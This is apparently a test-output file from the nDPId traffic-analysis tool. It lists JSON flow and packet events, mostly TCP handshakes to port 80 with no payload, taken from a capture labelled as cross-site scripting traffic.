+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347630130,"flow_last_seen":1499347630130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347630130,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1499347630130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347630130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rFRAAD4GGXysEAABwKgKMuduAFDOysKMAAAAAKACchB12gAAAgQFtAQCCAoBO27YAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":2,"flow_last_seen":1499347630130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347630130,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5252igpmzsrCjaAScSCxlQAAAgQFtAQCCAoD5UBOATtu2AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":3,"flow_last_seen":1499347630131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347630131,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rFVAAD4GGYOsEAABwKgKMuduAFDOysKNdooKZ4AQAOVQnAAAAQEICgE7btkD5UBO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347631388,"flow_last_seen":1499347631388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347631388,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1499347631388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347631388,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+pxAAD4GyzOsEAABwKgKMud8AFDgpIqPAAAAAKACchCatAAAAgQFtAQCCAoBO3ATAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":2,"flow_last_seen":1499347631388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347631388,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ53x5W3jF4KSKkKAScSBkBQAAAgQFtAQCCAoD5UGIATtwEwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":3,"flow_last_seen":1499347631389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347631389,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+p1AAD4GyzqsEAABwKgKMud8AFDgpIqQeVt4xoAQAOUDDQAAAQEICgE7cBMD5UGI"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347632635,"flow_last_seen":1499347632635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347632635,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1499347632635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347632635,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d6hAAD4GTiisEAABwKgKMueKAFDGJwbjAAAAAKACchA3mAAAAgQFtAQCCAoBO3FLAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":2,"flow_last_seen":1499347632635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347632635,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ54oMamRgxicG5KAScSCBBwAAAgQFtAQCCAoD5ULAATtxSwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5570,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":3,"flow_last_seen":1499347632636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347632636,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d6lAAD4GTi+sEAABwKgKMueKAFDGJwbkDGpkYYAQAOUgDwAAAQEICgE7cUsD5ULA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347635154,"flow_last_seen":1499347635154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347635154,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1499347635154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347635154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84sRAAD4G4wusEAABwKgKMuekAFB1fpEEAAAAAKACchD7kAAAAgQFtAQCCAoBO3PAAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5588,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":2,"flow_last_seen":1499347635154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347635154,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ56RhPiSidX6RBaAScSAtdAAAAgQFtAQCCAoD5UU2ATtzwAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5590,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":3,"flow_last_seen":1499347635156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347635156,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04sVAAD4G4xKsEAABwKgKMuekAFB1fpEFYT4ko4AQAOXMegAAAQEICgE7c8ED5UU2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347636429,"flow_last_seen":1499347636429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347636429,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1499347636429,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347636429,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AchAAD4GxAisEAABwKgKMueyAFDHeXU3AAAAAKACchDEFQAAAgQFtAQCCAoBO3T\/AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5600,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":2,"flow_last_seen":1499347636429,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347636429,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ57LbsY4Yx3l1OKAScSAQ0QAAAgQFtAQCCAoD5UZ0ATt0\/wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5602,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":3,"flow_last_seen":1499347636431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347636431,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AclAAD4GxA+sEAABwKgKMueyAFDHeXU427GOGYAQAOWv1wAAAQEICgE7dQAD5UZ0"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347637687,"flow_last_seen":1499347637687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1499347637687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347637687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W0xAAD4GaoSsEAABwKgKMufAAFAySC12AAAAAKACchCfvwAAAgQFtAQCCAoBO3Y6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":2,"flow_last_seen":1499347637687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347637687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ58BffWshMkgtd6AScSCKawAAAgQFtAQCCAoD5UevATt2OgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":3,"flow_last_seen":1499347637688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347637688,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W01AAD4GaousEAABwKgKMufAAFAySC13X31rIoAQAOUpcwAAAQEICgE7djoD5Uev"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347640199,"flow_last_seen":1499347640199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347640199,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1499347640199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347640199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81CZAAD4G8amsEAABwKgKMufaAFCvK6yIAAAAAKACchChOwAAAgQFtAQCCAoBO3iuAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":2,"flow_last_seen":1499347640199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347640199,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ59rwV\/OuryusiaAScSBwCwAAAgQFtAQCCAoD5UojATt4rgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5632,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":3,"flow_last_seen":1499347640200,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347640200,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01CdAAD4G8bCsEAABwKgKMufaAFCvK6yJ8Ffzr4AQAOUPEwAAAQEICgE7eK4D5Uoj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347641440,"flow_last_seen":1499347641440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347641440,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5641,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1499347641440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347641440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tE5AAD4GEYKsEAABwKgKMufoAFB3dM2qAAAAAKACchC2jAAAAgQFtAQCCAoBO3nkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":2,"flow_last_seen":1499347641440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347641440,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5+hNQiold3TNq6AScSDwxQAAAgQFtAQCCAoD5UtZATt55AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":3,"flow_last_seen":1499347641442,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347641442,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tE9AAD4GEYmsEAABwKgKMufoAFB3dM2rTUIqJoAQAOWPzQAAAQEICgE7eeQD5UtZ"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347642716,"flow_last_seen":1499347642716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347642716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1499347642716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347642716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SnNAAD4Ge12sEAABwKgKMuf2AFDcdDFQAAAAAKACchDsmQAAAgQFtAQCCAoBO3sjAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":2,"flow_last_seen":1499347642716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347642716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5\/aPKcRJ3HQxUaAScSBJiAAAAgQFtAQCCAoD5UyYATt7IwEDAwc="} 
